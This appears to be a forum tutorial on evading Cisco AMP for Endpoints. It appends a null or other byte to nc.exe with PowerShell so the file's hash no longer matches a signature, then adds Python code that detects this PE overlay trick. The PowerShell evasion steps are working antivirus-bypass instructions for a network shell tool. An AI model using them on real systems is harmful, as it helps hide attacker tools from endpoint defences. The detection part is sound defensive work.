Bypassing Antivirus (Cisco AMP for Endpoints)
Dear All,
It's been a while since we updated this forum.
Today we will talk about AV bypassing, or checking whether your antivirus really is what they claim it is.
So I started testing Cisco AMP for Endpoints; it was detecting the netcat file (nc.exe) as a remote monitoring tool and kept deleting it.
To bypass the AV I copied nc.exe to an excluded directory that I already knew about. In your case, you would have to perform the actions below on a VM or another machine that does not have Cisco AMP installed.
So let's start the bypassing process.
We will assume that we copy our nc.exe into the directory below:
C:\excluded\
- Open PowerShell (press Windows+R and type powershell).
- Move to the excluded directory in PowerShell: cd C:\excluded\
- Type the following commands in PowerShell. Replace test.exe with the name of the exe that you do not want the antivirus to detect.
- Get-FileHash -Path '.\test.exe' -Algorithm SHA256 (first, note the hash)
- Add-Content -Path '.\test.exe' -Value "`0" -NoNewline
- Or, in short form: Add-Content '.\test.exe' `0
Hit Enter.
You are all good. This executable will not be detected by Cisco AMP.
I have identified a few more characters you can add to your executable.
`0 -- Null
`a -- Alert
`b -- Backspace
`n -- New line
`r -- Carriage return
`t -- Horizontal tab
`' -- Single quote
`" -- Double quote
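What the steps above actually change is the file's SHA256: the appended byte lands past the end of the PE image, in what PE parsers call the overlay, so a hash-based signature no longer matches while the executable still runs unchanged. From the defender's side, that leaves a simple triage signal. The Python below is an added example, not code from the original post or from Cisco: it parses the section table of a PE file, reports how many bytes trail the last section, and computes a hash over only the part of the file the headers account for, which stays identical before and after the trick. The sample PE it builds is constructed inline (a 64-byte DOS stub, one section, no optional header) so the check runs offline; the function and file names are my own.

```python
import hashlib
import struct

SECTION_HEADER_SIZE = 40  # fixed size of an IMAGE_SECTION_HEADER


def pe_image_end(data: bytes) -> int:
    """Offset one past the last byte the PE headers account for
    (headers plus every section's raw data). Bytes beyond it are overlay."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: NumberOfSections at +2, SizeOfOptionalHeader at +16
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size
    end = table + num_sections * SECTION_HEADER_SIZE
    if end > len(data):
        raise ValueError("section table truncated")
    for i in range(num_sections):
        hdr = table + i * SECTION_HEADER_SIZE
        # SizeOfRawData at +16, PointerToRawData at +20 within the header
        size_raw, ptr_raw = struct.unpack_from("<II", data, hdr + 16)
        end = max(end, ptr_raw + size_raw)
    if end > len(data):
        raise ValueError("section data points past end of file")
    return end


def pe_overlay_size(data: bytes) -> int:
    """Number of bytes appended after the last section (0 for a clean image)."""
    return len(data) - pe_image_end(data)


def file_sha256(data: bytes) -> str:
    """Plain whole-file hash, the value Get-FileHash reports."""
    return hashlib.sha256(data).hexdigest()


def image_sha256(data: bytes) -> str:
    """Hash of the header-declared image only; unaffected by trailing bytes."""
    return hashlib.sha256(data[:pe_image_end(data)]).hexdigest()


def build_minimal_pe(code: bytes) -> bytes:
    """Constructed sample: a minimal PE layout sufficient for the parser above.
    It is not a loadable program, only a header-correct test fixture."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> PE signature at 0x40
    raw_ptr = 0x40 + 4 + 20 + SECTION_HEADER_SIZE  # first byte after the headers
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)
    section = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(code), 0x1000, len(code), raw_ptr, 0, 0, 0, 0, 0x60000020
    )
    return bytes(dos) + b"PE\0\0" + coff + section + code


def triage(data: bytes) -> dict:
    """Summarise one file the way an analyst would want it in a report."""
    overlay = pe_overlay_size(data)
    return {
        "file_sha256": file_sha256(data),
        "image_sha256": image_sha256(data),
        "overlay_bytes": overlay,
        "trailing_bytes_present": overlay > 0,
    }


if __name__ == "__main__":
    clean = build_minimal_pe(b"\xC3" * 16)          # constructed sample
    padded = clean + b"\x00"                        # what Add-Content "`0" produces
    for label, blob in (("clean", clean), ("padded", padded)):
        print(label, triage(blob))
```

Many legitimate files carry an overlay as well (Authenticode signatures and self-extracting installers live there), so a non-zero `overlay_bytes` is a reason to look closer, not a verdict; the stable `image_sha256` is the value worth keying detections or allow-lists on, since it does not move when bytes are appended.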